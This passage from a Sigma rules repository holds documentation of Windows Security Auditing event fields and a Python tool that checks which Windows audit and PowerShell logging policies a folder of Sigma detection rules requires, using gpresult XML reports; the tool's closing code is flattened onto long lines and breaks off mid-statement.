external device was recognized by the System](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416) - [6419: A request was made to disable a device](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6419) - [6420: A device was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6420) - [6421: A request was made to enable a device.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6421) - [6422: A device was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6422) - [6423: The installation of this device is forbidden by system policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423) - [6424: The installation of this device was allowed, after having previously been forbidden by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6424)
## Event Fields

### Provider: Microsoft Windows Security Auditing / EventID: 4624
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- LogonType
- LogonProcessName
- AuthenticationPackageName
- WorkstationName
- LogonGuid
- TransmittedServices
- LmPackageName
- KeyLength
- ProcessId
- ProcessName
- IpAddress
- IpPort
- ImpersonationLevel
- RestrictedAdminMode
- RemoteCredentialGuard
- TargetOutboundUserName
- TargetOutboundDomainName
- VirtualAccount
- TargetLinkedLogonId
- ElevatedToken
```
### Provider: Microsoft Windows Security Auditing / EventID: 4627
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- LogonType
- EventIdx
- EventCountTotal
- GroupMembership
```
### Provider: Microsoft Windows Security Auditing / EventID: 4663
Expand Details

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- ObjectType
- ObjectName
- HandleId
- AccessList
- AccessMask
- ProcessId
- ProcessName
- ResourceAttributes
```
### Provider: Microsoft Windows Security Auditing / EventID: 4670
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- ObjectType
- ObjectName
- HandleId
- OldSd
- NewSd
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4672
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- PrivilegeList
```
### Provider: Microsoft Windows Security Auditing / EventID: 4673
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- ObjectServer
- Service
- PrivilegeList
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4688
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- NewProcessId
- NewProcessName
- TokenElevationType
- ProcessId
- CommandLine
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- ParentProcessName
- MandatoryLabel
```
### Provider: Microsoft Windows Security Auditing / EventID: 4689
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- Status
- ProcessId
- ProcessName
```
### Provider: Microsoft Windows Security Auditing / EventID: 4702
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TaskName
- TaskContentNew
- ClientProcessStartKey
- ClientProcessId
- ParentProcessId
- RpcCallClientLocality
- FQDN
```
### Provider: Microsoft Windows Security Auditing / EventID: 4703
Expand

```yml
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
- TargetUserSid
- TargetUserName
- TargetDomainName
- TargetLogonId
- ProcessName
- ProcessId
- EnabledPrivilegeList
- DisabledPrivilegeList
```
### Provider: Microsoft Windows Security Auditing / EventID: 4957
Expand

```yml
- RuleId
- RuleName
- RuleAttr
```
### Provider: Microsoft Windows Security Auditing / EventID: 5447
Expand

```yml
- ProcessId
- UserSid
- UserName
- ProviderKey
- ProviderName
- ChangeType
- FilterKey
- FilterName
- FilterType
- FilterId
- LayerKey
- LayerName
- LayerId
- Weight
- Conditions
- Action
- CalloutKey
- CalloutName
```
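================================================ FILE: documentation/tools/sigma-logsource-checker.py ================================================
# Author: Nasreddine Bencherchali (@nas_bench) / Nextron Systems
#
# Sigma logsource checker: walks a folder of Sigma rules, groups the rules by
# the Windows log source they need, and (optionally) compares that against the
# audit policy found in a "gpresult.exe /x" XML report so that missing audit
# subcategories / logging policies can be pointed out per rule or per rule set.
__version__ = "0.1.0"

from time import sleep
import yaml
import os
import argparse
from colorama import init
from colorama import Fore
import collections
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Iterator

# Audit subcategory GUID -> the Security event IDs that subcategory produces and
# its display name. The GUIDs are the SubcategoryGuid values gpresult reports.
SECURITY_EVENT_ID_MAPPING = {
    # Account Logon
    "{0CCE923F-69AE-11D9-BED3-505054503030}": {"EventIDs": [4774, 4775, 4776, 4777], "Name": "Audit Credential Validation"},
    "{0CCE9242-69AE-11D9-BED3-505054503030}": {"EventIDs": [4768, 4771, 4772], "Name": "Audit Kerberos Authentication Service"},
    "{0CCE9240-69AE-11D9-BED3-505054503030}": {"EventIDs": [4769, 4770, 4773], "Name": "Audit Kerberos Service Ticket Operations"},
    "{0CCE9241-69AE-11D9-BED3-505054503030}": {"EventIDs": [], "Name": "Audit Other Account Logon Events"},
    # Account Management
    "{0CCE9239-69AE-11D9-BED3-505054503030}": {"EventIDs": [4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792], "Name": "Audit Application Group Management"},
    "{0CCE9236-69AE-11D9-BED3-505054503030}": {"EventIDs": [4741, 4742, 4743], "Name": "Audit Computer Account Management"},
    "{0CCE9238-69AE-11D9-BED3-505054503030}": {"EventIDs": [4749, 4750, 4751, 4752, 4753], "Name": "Audit Distribution Group Management"},
    "{0CCE923A-69AE-11D9-BED3-505054503030}": {"EventIDs": [4782, 4793], "Name": "Audit Other Account Management Events"},
    "{0CCE9237-69AE-11D9-BED3-505054503030}": {"EventIDs": [4731, 4732, 4733, 4734, 4735, 4764, 4799, 4727, 4737, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758], "Name": "Audit Security Group Management"},
    "{0CCE9235-69AE-11D9-BED3-505054503030}": {"EventIDs": [4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4765, 4766, 4767, 4780, 4781, 4794, 4798, 5376, 5377], "Name": "Audit User Account Management"},
    # Detailed Tracking
    "{0CCE922D-69AE-11D9-BED3-505054503030}": {"EventIDs": [4692, 4693, 4694, 4695], "Name": "Audit DPAPI Activity"},
    "{0CCE9248-69AE-11D9-BED3-505054503030}": {"EventIDs": [6416, 6419, 6420, 6421, 6422, 6423, 6424], "Name": "Audit PNP Activity"},
    "{0CCE922B-69AE-11D9-BED3-505054503030}": {"EventIDs": [4688, 4696], "Name": "Audit Process Creation"},
    "{0CCE922C-69AE-11D9-BED3-505054503030}": {"EventIDs": [4689], "Name": "Audit Process Termination"},
    "{0CCE922E-69AE-11D9-BED3-505054503030}": {"EventIDs": [5712], "Name": "Audit RPC Events"},
    "{0CCE924A-69AE-11D9-BED3-505054503030}": {"EventIDs": [4703], "Name": "Audit Token Right Adjusted"},
    # DS Access
    "{0CCE923E-69AE-11D9-BED3-505054503030}": {"EventIDs": [4928, 4929, 4930, 4931, 4934, 4935, 4936, 4937], "Name": "Audit Detailed Directory Service Replication"},
    "{0CCE923B-69AE-11D9-BED3-505054503030}": {"EventIDs": [4661, 4662], "Name": "Audit Directory Service Access"},
    "{0CCE923C-69AE-11D9-BED3-505054503030}": {"EventIDs": [5136, 5137, 5138, 5139, 5141], "Name": "Audit Directory Service Changes"},
    "{0CCE923D-69AE-11D9-BED3-505054503030}": {"EventIDs": [4932, 4933], "Name": "Audit Directory Service Replication"},
    # Logon/Logoff
    "{0CCE9217-69AE-11D9-BED3-505054503030}": {"EventIDs": [4625], "Name": "Audit Account Lockout"},
    "{0CCE9247-69AE-11D9-BED3-505054503030}": {"EventIDs": [4626], "Name": "Audit User/Device Claims"},
    "{0CCE9249-69AE-11D9-BED3-505054503030}": {"EventIDs": [4627], "Name": "Audit Group Membership"},
    "{0CCE921A-69AE-11D9-BED3-505054503030}": {"EventIDs": [4978, 4979, 4980, 4981, 4982, 4983, 4984], "Name": "Audit IPsec Extended Mode"},
    "{0CCE9218-69AE-11D9-BED3-505054503030}": {"EventIDs": [4646, 4650, 4651, 4652, 4653, 4655, 4976, 5049, 5453], "Name": "Audit IPsec Main Mode"},
    "{0CCE9219-69AE-11D9-BED3-505054503030}": {"EventIDs": [4977, 5451, 5452], "Name": "Audit IPsec Quick Mode"},
    "{0CCE9216-69AE-11D9-BED3-505054503030}": {"EventIDs": [4634, 4647], "Name": "Audit Logoff"},
    "{0CCE9215-69AE-11D9-BED3-505054503030}": {"EventIDs": [4624, 4625, 4648, 4675], "Name": "Audit Logon"},
    "{0CCE9243-69AE-11D9-BED3-505054503030}": {"EventIDs": [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280], "Name": "Audit Network Policy Server"},
    "{0CCE921C-69AE-11D9-BED3-505054503030}": {"EventIDs": [4649, 4778, 4779, 4800, 4801, 4802, 4803, 5378, 5632, 5633], "Name": "Audit Other Logon/Logoff Events"},
    "{0CCE921B-69AE-11D9-BED3-505054503030}": {"EventIDs": [4964, 4672], "Name": "Audit Special Logon"},
    # Object Access
    "{0CCE9222-69AE-11D9-BED3-505054503030}": {"EventIDs": [4665, 4666, 4667, 4668], "Name": "Audit Application Generated"},
    "{0CCE9221-69AE-11D9-BED3-505054503030}": {"EventIDs": [4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898], "Name": "Audit Certification Services"},
    "{0CCE9244-69AE-11D9-BED3-505054503030}": {"EventIDs": [5145], "Name": "Audit Detailed File Share"},
    "{0CCE9224-69AE-11D9-BED3-505054503030}": {"EventIDs": [5140, 5142, 5143, 5144, 5168], "Name": "Audit File Share"},
    "{0CCE921D-69AE-11D9-BED3-505054503030}": {"EventIDs": [4656, 4658, 4660, 4663, 4664, 4670, 4985, 5051], "Name": "Audit File System"},
    "{0CCE9226-69AE-11D9-BED3-505054503030}": {"EventIDs": [5031, 5150, 5151, 5154, 5155, 5156, 5157, 5158, 5159], "Name": "Audit Filtering Platform Connection"},
    "{0CCE9225-69AE-11D9-BED3-505054503030}": {"EventIDs": [5152, 5153], "Name": "Audit Filtering Platform Packet Drop"},
    "{0CCE9223-69AE-11D9-BED3-505054503030}": {"EventIDs": [4658, 4690], "Name": "Audit Handle Manipulation"},
    "{0CCE921F-69AE-11D9-BED3-505054503030}": {"EventIDs": [4656, 4658, 4660, 4663], "Name": "Audit Kernel Object"},
    "{0CCE9227-69AE-11D9-BED3-505054503030}": {"EventIDs": [4671, 4691, 4698, 4699, 4700, 4701, 4702, 5148, 5149, 5888, 5889, 5890], "Name": "Audit Other Object Access Events"},
    "{0CCE921E-69AE-11D9-BED3-505054503030}": {"EventIDs": [4656, 4657, 4658, 4660, 4663, 4670, 5039], "Name": "Audit Registry"},
    "{0CCE9245-69AE-11D9-BED3-505054503030}": {"EventIDs": [4656, 4658, 4663], "Name": "Audit Removable Storage"},
    "{0CCE9220-69AE-11D9-BED3-505054503030}": {"EventIDs": [4661], "Name": "Audit SAM"},
    "{0CCE9246-69AE-11D9-BED3-505054503030}": {"EventIDs": [4818], "Name": "Audit Central Access Policy Staging"},
    # Policy Change
    "{0CCE922F-69AE-11D9-BED3-505054503030}": {"EventIDs": [4715, 4719, 4817, 4902, 4906, 4907, 4908, 4912, 4904, 4905], "Name": "Audit Audit Policy Change"},
    "{0CCE9230-69AE-11D9-BED3-505054503030}": {"EventIDs": [4670, 4706, 4707, 4716, 4713, 4717, 4718, 4739, 4864, 4865, 4866, 4867], "Name": "Audit Authentication Policy Change"},
    "{0CCE9231-69AE-11D9-BED3-505054503030}": {"EventIDs": [4703, 4704, 4705, 4670, 4911, 4913], "Name": "Audit Authorization Policy Change"},
    "{0CCE9233-69AE-11D9-BED3-505054503030}": {"EventIDs": [4709, 4710, 4711, 4712, 5040, 5041, 5042, 5043, 5044, 5045, 5046, 5047, 5048, 5440, 5441, 5442, 5443, 5444, 5446, 5448, 5449, 5450, 5456, 5457, 5458, 5459, 5460, 5461, 5462, 5463, 5464, 5465, 5466, 5467, 5468, 5471, 5472, 5473, 5474, 5477], "Name": "Audit Filtering Platform Policy Change"},
    "{0CCE9232-69AE-11D9-BED3-505054503030}": {"EventIDs": [4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4956, 4957, 4958], "Name": "Audit MPSSVC Rule-Level Policy Change"},
    "{0CCE9234-69AE-11D9-BED3-505054503030}": {"EventIDs": [4714, 4819, 4826, 4909, 4910, 5063, 5064, 5065, 5066, 5067, 5068, 5069, 5070, 5447, 6144, 6145], "Name": "Audit Other Policy Change Events"},
    # Privilege Use
    "{0CCE9229-69AE-11D9-BED3-505054503030}": {"EventIDs": [4673, 4674, 4985], "Name": "Audit Non Sensitive Privilege Use"},
    "{0CCE922A-69AE-11D9-BED3-505054503030}": {"EventIDs": [4985], "Name": "Audit Other Privilege Use Events"},
    "{0CCE9228-69AE-11D9-BED3-505054503030}": {"EventIDs": [4673, 4674, 4985], "Name": "Audit Sensitive Privilege Use"},
    # System
    "{0CCE9213-69AE-11D9-BED3-505054503030}": {"EventIDs": [4960, 4961, 4962, 4963, 4965, 5478, 5479, 5480, 5483, 5484, 5485], "Name": "Audit IPsec Driver"},
    "{0CCE9214-69AE-11D9-BED3-505054503030}": {"EventIDs": [5024, 5025, 5027, 5028, 5029, 5030, 5032, 5033, 5034, 5035, 5037, 5058, 5059, 6400, 6401, 6402, 6403, 6404, 6405, 6406, 6407, 6408, 6409], "Name": "Audit Other System Events"},
    "{0CCE9210-69AE-11D9-BED3-505054503030}": {"EventIDs": [4608, 4616, 4621], "Name": "Audit Security State Change"},
    "{0CCE9211-69AE-11D9-BED3-505054503030}": {"EventIDs": [4610, 4611, 4614, 4622, 4697], "Name": "Audit Security System Extension"},
    "{0CCE9212-69AE-11D9-BED3-505054503030}": {"EventIDs": [4612, 4615, 4618, 4816, 5038, 5056, 5062, 5057, 5060, 5061, 6281, 6410], "Name": "Audit System Integrity"}
}

# Default (everything disabled) view of the registry-based logging policies the
# tool cares about; used when no gpresult report is supplied. The shape mirrors
# what parse_gpresult() returns: {policy category: [{policy name: state}, ...]}.
OTHER_EVENT_ID_MAPPING = {
    'PowerShell Core': [
        {'Turn on Module Logging': 'Disabled'},
        {'Turn on PowerShell Script Block Logging': 'Disabled'},
        {'Turn on PowerShell Transcription': 'Disabled'}
    ],
    'System/Audit Process Creation': [
        {'Include command line in process creation events': 'Disabled'}
    ],
    'Windows Components/Windows PowerShell': [
        {'Turn on Module Logging': 'Disabled'},
        {'Turn on PowerShell Script Block Logging': 'Disabled'},
        {'Turn on PowerShell Transcription': 'Disabled'}
    ]
}

WINDOWS_SYSMON_PROCESS_CREATION_FIELDS = ["RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image", "FileVersion", "Description", "Product", "Company", "OriginalFileName", "CommandLine", "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId", "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId", "ParentImage", "ParentCommandLine", "ParentUser"]

# A reduced set of unique fields that only available to Sysmon/1 - Used for testing
WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS = ["RuleName", "UtcTime", "ProcessGuid", "FileVersion", "Description", "Product", "Company", "OriginalFileName", "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId", "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId", "ParentCommandLine", "ParentUser"]

WINDOWS_SECURITY_PROCESS_CREATION_FIELDS = ["SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "TargetUserSid", "TargetUserName", "TargetDomainName", "TargetLogonId", "ParentProcessName", "MandatoryLabel"]

# A reduced set of unique fields that only available to Security/4688 - Used for testing
WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS = ["SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "TargetUserSid", "TargetUserName", "TargetDomainName", "TargetLogonId", "ParentProcessName", "MandatoryLabel"]


def yield_next_rule_file_path(path_to_rules: str) -> Iterator[str]:
    """Recursively yield the path of every ``.yml`` file below ``path_to_rules``."""
    for root, _, files in os.walk(path_to_rules):
        for file in files:
            if file.endswith(".yml"):
                yield os.path.join(root, file)


def get_rule_part(file_path: str, part_name: str):
    """Return the value of top-level key ``part_name`` from the first YAML
    document of ``file_path`` that defines it, or ``None`` if none does.

    Documents that are not mappings (an empty document is loaded as ``None``)
    are skipped instead of raising on ``.keys()``.
    """
    for yaml_part in get_rule_yaml(file_path):
        if isinstance(yaml_part, dict) and part_name in yaml_part:
            return yaml_part[part_name]
    return None


def get_rule_yaml(file_path: str) -> list:
    """Load every YAML document contained in ``file_path`` and return them as a list.

    ``yaml.safe_load_all`` is deliberate: rule files are arbitrary input and
    must never go through the full (object-constructing) loader.
    """
    with open(file_path, encoding='utf-8') as f:
        return list(yaml.safe_load_all(f))


def extract_events_ids(detection) -> list:
    """Collect every integer ``EventID`` referenced by the selections of a
    rule's ``detection`` block, in order of appearance (duplicates kept).

    Selections written as a mapping and as a list of mappings are both
    handled (the list form used to be silently ignored), and an ``EventID``
    key carrying a modifier (``EventID|...``) is recognised. As before, a
    scalar value is only taken when it is an ``int``; list values are taken
    as-is.

    :param detection: the rule's ``detection`` mapping; anything else yields ``[]``.
    """
    eids_list = []
    if not isinstance(detection, dict):
        return eids_list

    def _collect(selection: dict) -> None:
        for key_, value_ in selection.items():
            if str(key_).split("|")[0] != "EventID":
                continue
            if isinstance(value_, list):
                eids_list.extend(value_)
            elif isinstance(value_, int) and not isinstance(value_, bool):
                eids_list.append(value_)

    for value in detection.values():
        if isinstance(value, dict):
            _collect(value)
        elif isinstance(value, list):
            for element in value:
                if isinstance(element, dict):
                    _collect(element)
    return eids_list


def test_invalid_logsource_attributes(path_to_rules) -> list:
    """Return the rule files whose ``logsource`` is missing, is not a mapping,
    uses an attribute outside ``category``/``product``/``service``/``definition``,
    or has a non-string attribute value. Each finding is also printed.
    """
    faulty_rules = []
    valid_logsource = [
        'category',
        'product',
        'service',
        'definition',
    ]
    for file in yield_next_rule_file_path(path_to_rules):
        logsource = get_rule_part(file_path=file, part_name="logsource")
        if not logsource:
            print("Rule {} has no 'logsource'.".format(file))
            faulty_rules.append(file)
            continue
        # A scalar or list logsource would otherwise be iterated element by element.
        if not isinstance(logsource, dict):
            print("Rule {} has a 'logsource' that is not a mapping.".format(file))
            faulty_rules.append(file)
            continue
        valid = True
        for key in logsource:
            if str(key).lower() not in valid_logsource:
                print("Rule {} has a logsource with an invalid field ({})".format(file, key))
                valid = False
            elif not isinstance(logsource[key], str):
                print("Rule {} has a logsource with an invalid field type ({})".format(file, key))
                valid = False
        if not valid:
            faulty_rules.append(file)
    return faulty_rules


def extract_fields(detection) -> list:
    """Return the unique field names (modifiers after ``|`` stripped) used by
    the selections of a rule's ``detection`` block, in order of first appearance.

    :param detection: the rule's ``detection`` mapping; anything else yields ``[]``.
    """
    list_of_fields = []
    if not isinstance(detection, dict):
        return list_of_fields

    def _add_fields(selection: dict) -> None:
        for key_ in selection:
            field = str(key_).split("|")[0]
            if field not in list_of_fields:
                list_of_fields.append(field)

    for value in detection.values():
        if isinstance(value, list):
            for element in value:
                if isinstance(element, dict):
                    _add_fields(element)
        elif isinstance(value, dict):
            _add_fields(value)
    return list_of_fields


def get_logsource_dict(path_to_rules, broken_rules):
    """Group the rules below ``path_to_rules`` by the Windows log sources this
    tool knows how to check.

    Rules in ``broken_rules`` (see ``test_invalid_logsource_attributes``) are
    skipped, as are rules whose logsource names only a product (too generic for
    V0.1, e.g. the generic Mimikatz rule) and rules with no ``detection`` block.
    ``category`` takes precedence over ``service`` when both are present.

    :return: five dicts, in this order:
        security-service rules ``{file: [EventIDs]}``,
        powershell-service rules ``{file: [EventIDs]}``,
        process_creation rules ``{file: [fields]}``,
        ps_module rules ``{file: [fields]}``,
        ps_script rules ``{file: [fields]}``.
    """
    windows_service_security_dict = defaultdict(list)
    windows_service_powershell_dict = defaultdict(list)
    windows_category_process_creation_dict = defaultdict(list)
    windows_category_ps_module_dict = defaultdict(list)
    windows_category_ps_script_dict = defaultdict(list)

    for file_ in yield_next_rule_file_path(path_to_rules):
        if file_ in broken_rules:
            continue
        logsource = get_rule_part(file_path=file_, part_name="logsource")
        detection = get_rule_part(file_path=file_, part_name="detection")
        # A rule without a usable logsource or detection block cannot be classified.
        if not isinstance(logsource, dict) or not isinstance(detection, dict):
            continue
        # "definition" is free text and must not count as a classifying attribute.
        logsource = {k: v for k, v in logsource.items() if k != "definition"}
        if "product" in logsource and len(logsource) == 1:
            # We skip rules that do not specify exact services for V0.1 // Mainly the generic MIMIKATZ rule
            continue
        # For V0.1 we check for windows logs only
        if str(logsource.get("product", "")).lower() != "windows":
            continue

        if "category" in logsource:
            category = str(logsource["category"]).lower()
            # {"rule_file_name" : [fields used]}
            if category == "process_creation":
                windows_category_process_creation_dict[file_] = extract_fields(detection)
            elif category == "ps_script":
                windows_category_ps_script_dict[file_] = extract_fields(detection)
            elif category == "ps_module":
                windows_category_ps_module_dict[file_] = extract_fields(detection)
        elif "service" in logsource:
            service = str(logsource["service"]).lower()
            # {"rule_file_name" : [EventIDs used]}
            if service == "security":
                windows_service_security_dict[file_] = extract_events_ids(detection)
            elif service == "powershell":
                windows_service_powershell_dict[file_] = extract_events_ids(detection)

    return windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict


def enrich_logsource_dict(logsource_dict_list):
    """Placeholder for future per-logsource enrichment; currently a no-op.

    The previous version tested ``"product" in logsource.keys`` (bound method,
    no call), which raises ``TypeError`` on the first element; the membership
    tests are now done on the mapping itself.
    """
    for logsource in logsource_dict_list:
        if isinstance(logsource, dict) and logsource.get("product") == "windows":
            if "service" in logsource:
                pass
            elif "category" in logsource:
                pass


def parse_gpresult(gpresult):
    """Parse the XML written by ``gpresult.exe /x`` and return the audit state
    this tool checks against.

    :param gpresult: path to the gpresult XML report. This is an operator-
        produced file; ``xml.etree`` is not hardened against hostile XML, so
        do not feed it reports obtained from untrusted sources.
    :return: ``(enabled_sec_policies, enabled_other_logs)`` where the first is
        a list of upper-cased audit subcategory GUIDs whose SettingValue is
        "1" (Success) or "3" (Success and Failure), and the second maps a
        registry-policy category to a list of ``{policy name: state}`` dicts.
    :raises ValueError: if the report contains no ``ComputerResults`` element
        (previously an unbound-name error).
    """
    enabled_sec_policies = []
    enabled_other_logs = defaultdict(list)
    root = ET.parse(gpresult).getroot()

    computer_results = next((child for child in root if "ComputerResults" in child.tag), None)
    if computer_results is None:
        raise ValueError("gpresult XML has no 'ComputerResults' element: {}".format(gpresult))

    for extension_data in computer_results:
        if "ExtensionData" not in extension_data.tag or len(extension_data) == 0:
            continue
        extension = extension_data[0]
        if not extension.attrib:
            continue
        # The extension's first attribute (its xsi:type) says which kind of settings it holds.
        ext_type = next(iter(extension.attrib.values()))

        if "AuditSettings" in ext_type:
            for audit in extension:
                subcategory_guid = None
                setting_value = None
                for element in audit:
                    if "SubcategoryGuid" in element.tag:
                        subcategory_guid = element.text
                    elif "SettingValue" in element.tag:
                        setting_value = element.text
                # If the audit setting is enabled for "Success" or both "Success and Failure"
                # then it's okay (for V0.1). An entry missing either child is ignored
                # rather than crashing.
                if subcategory_guid and setting_value in ("1", "3"):
                    enabled_sec_policies.append(subcategory_guid.upper())

        elif "Registry" in ext_type:
            for policy in extension:
                if "}Policy" not in policy.tag:
                    continue
                policy_name = None
                policy_state = None
                policy_category = None
                for element in policy:
                    if "Name" in element.tag:
                        policy_name = element.text
                    elif "State" in element.tag:
                        policy_state = element.text
                    elif "Category" in element.tag:
                        policy_category = element.text
                # A policy without a category cannot be looked up later; skip it.
                if policy_category is None:
                    continue
                # {"Category": [{"Name": "State"}, ...]}
                enabled_other_logs[policy_category].append({policy_name: policy_state})

    return enabled_sec_policies, enabled_other_logs


# Entry point: argument handling and the per-rule / per-rule-set report are
# generated here (the report logic continues below).
if __name__ == "__main__":
    print(f""" _____ _ / ___/(_)___ _____ ___ ____ _ \__ \/ / __ `/ __ `__ \/ __ `/ ___/ / / /_/ / / / / / / /_/ / /____/_/\__, /_/ /_/ /_/\__,_/ ________ __ / / /____/ ____ __________ __ _______________ / ____/ /_ ___ _____/ /_____ _____ / / / __ \/ __ `/ ___/ __ \/ / / / ___/ ___/ _ \ / / / __ \/ _ \/ ___/ //_/ _ \/ ___/ / /___/ /_/ / /_/ (__ ) /_/ / /_/ / / / /__/ __/ / /___/ / / / __/ /__/ ,< / __/ / /_____/\____/\__, /____/\____/\__,_/_/ \___/\___/ \____/_/ /_/\___/\___/_/|_|\___/_/ /____/ by Nasreddine Bencherchali (Nextron Systems), v{__version__} """)
    parser = argparse.ArgumentParser(description='SIGMA Logsource Checker')
    parser.add_argument('-d', help='Path to input directory (SIGMA rules folder; recursive)', metavar='sigma-rules-folder', required=True)
    parser.add_argument('-gp', help='XML output of the command "gpresult.exe /x [path]"', metavar='gpresult')
    #parser.add_argument('-sysmon', help='Sysmon configuration', metavar='sysmon-config') # TODO: add Sysmon config parser
    parser.add_argument('-v', help='Get audit and logging details for every rule', action="store_true")
    #parser.add_argument('-vv', help='Get audit and logging details for every rule', metavar='Very Verbose')
    args = parser.parse_args()
    if os.path.isdir(args.d):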
path_to_rules = args.d else: print("The path provided isn't a directory: %s" % args.d) exit(1) if args.gp: gpresult = args.gp print("Parsing gpresults file (XML) %s ...\n" % args.gp) subcategory_id, enabled_other_logs = parse_gpresult(gpresult) else: subcategory_id = [] enabled_other_logs = OTHER_EVENT_ID_MAPPING print("Discovering used log sources ...\n") faulty_rules = test_invalid_logsource_attributes(path_to_rules) windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict = get_logsource_dict(path_to_rules, faulty_rules) if args.v: print("Generating detailed logging requirements information for every rule...\n") sleep(1) if windows_category_process_creation_dict: print(f"\nChecking rules with logsource - 'product: windows / category: process_creation'...") # We check special fields. If they exist then we suggest the policy to be enabled for filename, fields in windows_category_process_creation_dict.items(): special_fields_sysmon = [] special_fields_security = [] for field in fields: if field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS: special_fields_sysmon.append(field) elif field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS: special_fields_security.append(field) if special_fields_sysmon: print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-Sysmon EID 1 to be enabled".format(os.path.basename(filename), special_fields_sysmon)) elif special_fields_security: if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id: print("-> Rule '{}' uses fields: {} which Requires Microsoft Windows Security Auditing EID 4688 to be enabled".format(os.path.basename(filename), special_fields_security)) else: if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id: print("-> Rule '{}' uses fields: {} which Requires 'Microsoft Windows Security Auditing EID 4688' or 'Microsoft-Windows-Sysmon EID 1' to be 
enabled".format(os.path.basename(filename), fields)) if windows_category_ps_module_dict: print(f"\nChecking rules with logsource - 'product: windows / category: ps_module'...") pwsh5_ps_module_enabled = False pwsh5 = "Windows Components/Windows PowerShell" #pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks if pwsh5 in enabled_other_logs: if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] == "Enabled": pwsh5_ps_module_enabled = True for filename, fields in windows_category_ps_module_dict.items(): if not pwsh5_ps_module_enabled: print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4103 to be enabled".format(os.path.basename(filename), fields)) if windows_category_ps_script_dict: print(f"\nChecking rules with logsource - 'product: windows / category: ps_script'...") pwsh5_ps_script_enabled = False pwsh5 = "Windows Components/Windows PowerShell" #pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks if pwsh5 in enabled_other_logs: if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] == "Enabled": pwsh5_ps_script_enabled = True for filename, fields in windows_category_ps_script_dict.items(): if not pwsh5_ps_script_enabled: print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4104 to be enabled".format(os.path.basename(filename), fields)) if windows_service_security_dict: print(f"\nChecking rules using logsource - 'product: windows / service: security'...") for filename, eids in windows_service_security_dict.items(): specific_eids = set() specific_subcategory = set() for eid in eids: for key, value in SECURITY_EVENT_ID_MAPPING.items(): if value['EventIDs']: if ((eid in value['EventIDs']) and (key not in subcategory_id)): specific_eids.add(eid) specific_subcategory.add((key, value['Name'])) specific_eids = list(specific_eids) specific_subcategory = list(specific_subcategory) if len(specific_subcategory) > 1: print("-> Rule '{}' uses EventIDs: {} which 
